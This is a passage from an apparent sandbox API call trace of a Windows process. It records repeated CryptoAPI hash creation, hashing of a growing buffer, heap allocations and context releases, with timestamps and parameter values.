hHash=0x3396ee80, dwParam=0x2, pbData=0x32ad1220, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad1220, pdwDataLen=0xce0bc) returned 1 [0190.303] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0190.303] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.303] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.304] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.304] CryptHashData (hHash=0x3396ef60, pbData=0x32349170, dwDataLen=0xf80, dwFlags=0x0) returned 1 [0190.304] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0e90 [0190.304] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32ad0e90, pdwDataLen=0xce0bc, dwFlags=0x0 | out: pbData=0x32ad0e90, pdwDataLen=0xce0bc) returned 1 [0190.304] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0190.304] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.304] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.304] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.304] CryptHashData (hHash=0x3396ee10, pbData=0x32349170, dwDataLen=0xfa0, dwFlags=0x0) returned 1 [0190.305] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xce0bc, pdwDataLen=0xce0cc, dwFlags=0x0 | out: pbData=0xce0bc, pdwDataLen=0xce0cc) returned 1 [0190.305] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0980 [0190.305] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0190.305] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.305] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.305] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.306] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0xfc0, dwFlags=0x0) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0c50 [0190.306] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.306] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.306] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.306] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.306] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0xfe0, dwFlags=0x0) returned 1 [0190.306] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0f50 [0190.306] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.306] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.306] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338233d0) returned 1 [0190.307] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.307] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x1000, dwFlags=0x0) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad12e0 [0190.307] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.307] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0190.307] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32349170 | out: hHeap=0x2150000) returned 1 [0190.307] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32349170 [0190.307] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.308] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.308] CryptHashData (hHash=0x3396f0b0, pbData=0x32349170, dwDataLen=0x20, dwFlags=0x0) returned 1 [0190.308] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1310 [0190.308] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0190.308] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.308] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.308] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.308] CryptHashData (hHash=0x3396ea90, pbData=0x32349170, dwDataLen=0x40, dwFlags=0x0) returned 1 [0190.309] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0fb0 [0190.309] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0190.309] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.309] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.309] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.309] CryptHashData (hHash=0x3396f890, pbData=0x32349170, dwDataLen=0x60, dwFlags=0x0) returned 1 [0190.309] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1340 [0190.309] CryptDestroyHash (hHash=0x3396f890) returned 1 [0190.309] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.309] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.310] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.310] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x80, dwFlags=0x0) returned 1 [0190.310] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0c80 [0190.310] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.310] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.310] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338226d0) returned 1 [0190.310] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.310] CryptHashData (hHash=0x3396f6d0, pbData=0x32349170, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0190.310] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0a70 [0190.310] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0190.311] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0190.311] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.311] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.311] CryptHashData (hHash=0x3396f6d0, pbData=0x32349170, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0190.311] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0a40 [0190.311] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0190.311] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.311] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338226d0) returned 1 [0190.315] CryptCreateHash (in: hProv=0x338226d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.315] CryptHashData (hHash=0x3396eef0, pbData=0x32349170, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0190.315] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0aa0 [0190.315] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0190.315] CryptReleaseContext (hProv=0x338226d0, dwFlags=0x0) returned 1 [0190.315] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338221d0) returned 1 [0190.316] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.316] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0x100, dwFlags=0x0) returned 1 [0190.316] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0bc0 [0190.316] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.316] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0190.316] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.316] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.316] CryptHashData (hHash=0x3396f580, pbData=0x32349170, dwDataLen=0x120, dwFlags=0x0) returned 1 [0190.317] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0bf0 [0190.317] CryptDestroyHash (hHash=0x3396f580) returned 1 [0190.317] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.317] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338238d0) returned 1 [0190.317] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.317] CryptHashData (hHash=0x3396f200, pbData=0x32349170, dwDataLen=0x140, dwFlags=0x0) returned 1 [0190.317] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1040 [0190.317] CryptDestroyHash (hHash=0x3396f200) returned 1 [0190.317] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0190.317] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821fd0) returned 1 [0190.318] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.318] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0x160, dwFlags=0x0) returned 1 [0190.318] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0fe0 [0190.318] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.318] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0190.318] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822bd0) returned 1 [0190.319] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.319] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x180, dwFlags=0x0) returned 1 [0190.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0c20 [0190.319] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.319] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0190.319] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338220d0) returned 1 [0190.319] CryptCreateHash (in: hProv=0x338220d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.319] CryptHashData (hHash=0x3396f4a0, pbData=0x32349170, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0190.319] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0d10 [0190.319] CryptDestroyHash (hHash=0x3396f4a0) returned 1 [0190.319] CryptReleaseContext (hProv=0x338220d0, dwFlags=0x0) returned 1 [0190.319] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33823ad0) returned 1 [0190.320] CryptCreateHash (in: hProv=0x33823ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.320] CryptHashData (hHash=0x3396f3c0, pbData=0x32349170, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0190.320] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad0d40 [0190.320] CryptDestroyHash (hHash=0x3396f3c0) returned 1 [0190.320] CryptReleaseContext (hProv=0x33823ad0, dwFlags=0x0) returned 1 [0190.320] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.321] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.321] CryptHashData (hHash=0x3396f660, pbData=0x32349170, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0190.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1070 [0190.321] CryptDestroyHash (hHash=0x3396f660) returned 1 [0190.321] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.321] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822dd0) returned 1 [0190.321] CryptCreateHash (in: hProv=0x33822dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.321] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x200, dwFlags=0x0) returned 1 [0190.321] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad14f0 [0190.321] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.321] CryptReleaseContext (hProv=0x33822dd0, dwFlags=0x0) returned 1 [0190.321] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822fd0) returned 1 [0190.322] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.322] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x220, dwFlags=0x0) returned 1 [0190.322] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1700 [0190.322] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.322] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0190.322] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338227d0) returned 1 [0190.323] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.323] CryptHashData (hHash=0x3396ea20, pbData=0x32349170, dwDataLen=0x240, dwFlags=0x0) returned 1 [0190.323] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1970 [0190.323] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0190.323] CryptReleaseContext (hProv=0x338227d0, dwFlags=0x0) returned 1 [0190.323] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.323] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.323] CryptHashData (hHash=0x3396f890, pbData=0x32349170, dwDataLen=0x260, dwFlags=0x0) returned 1 [0190.323] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1df0 [0190.323] CryptDestroyHash (hHash=0x3396f890) returned 1 [0190.323] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.323] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338222d0) returned 1 [0190.324] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.324] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x280, dwFlags=0x0) returned 1 [0190.324] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad19a0 [0190.324] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.324] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0190.324] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.325] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.325] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0190.325] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1b80 [0190.325] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.325] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.325] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.325] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.325] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0190.325] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1850 [0190.325] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.325] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.325] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338235d0) returned 1 [0190.326] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.326] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0190.326] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1640 [0190.326] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.326] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0190.326] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33822ed0) returned 1 [0190.327] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.327] CryptHashData (hHash=0x3396eb00, pbData=0x32349170, dwDataLen=0x300, dwFlags=0x0) returned 1 [0190.327] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1730 [0190.327] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0190.327] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0190.327] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.329] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.329] CryptHashData (hHash=0x3396eda0, pbData=0x32349170, dwDataLen=0x320, dwFlags=0x0) returned 1 [0190.329] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad16a0 [0190.329] CryptDestroyHash (hHash=0x3396eda0) returned 1 [0190.329] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.329] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.330] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.330] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x340, dwFlags=0x0) returned 1 [0190.330] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1a30 [0190.330] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.330] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.330] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338239d0) returned 1 [0190.331] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.331] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x360, dwFlags=0x0) returned 1 [0190.331] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad19d0 [0190.331] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.331] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0190.331] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338236d0) returned 1 [0190.331] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.331] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x380, dwFlags=0x0) returned 1 [0190.331] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32ad1e80 [0190.331] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.331] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0190.331] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.332] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.332] CryptHashData (hHash=0x3396f350, pbData=0x32349170, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0190.332] CryptDestroyHash (hHash=0x3396f350) returned 1 [0190.332] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.332] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338228d0) returned 1 [0190.333] CryptCreateHash (in: hProv=0x338228d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.333] CryptHashData (hHash=0x3396ee10, pbData=0x32349170, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0190.333] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0190.333] CryptReleaseContext (hProv=0x338228d0, dwFlags=0x0) returned 1 [0190.333] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338231d0) returned 1 [0190.333] CryptCreateHash (in: hProv=0x338231d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.333] CryptHashData (hHash=0x3396f430, pbData=0x32349170, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0190.333] CryptDestroyHash (hHash=0x3396f430) returned 1 [0190.333] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0190.333] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338225d0) returned 1 [0190.334] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.334] CryptHashData (hHash=0x3396efd0, pbData=0x32349170, dwDataLen=0x400, dwFlags=0x0) returned 1 [0190.334] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0190.334] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0190.334] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x33821ed0) returned 1 [0190.334] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.335] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x420, dwFlags=0x0) returned 1 [0190.335] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.335] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0190.335] CryptAcquireContextW (in: phProv=0xce0d0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce0d0*=0x338230d0) returned 1 [0190.335] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce0c0 | out: phHash=0xce0c0) returned 1 [0190.335] CryptHashData (hHash=0x3396ed30, pbData=0x32349170, dwDataLen=0x440, dwFlags=0x0) returned 1 [0190.335] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0190.335] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0190.335] CryptAcquireContextW 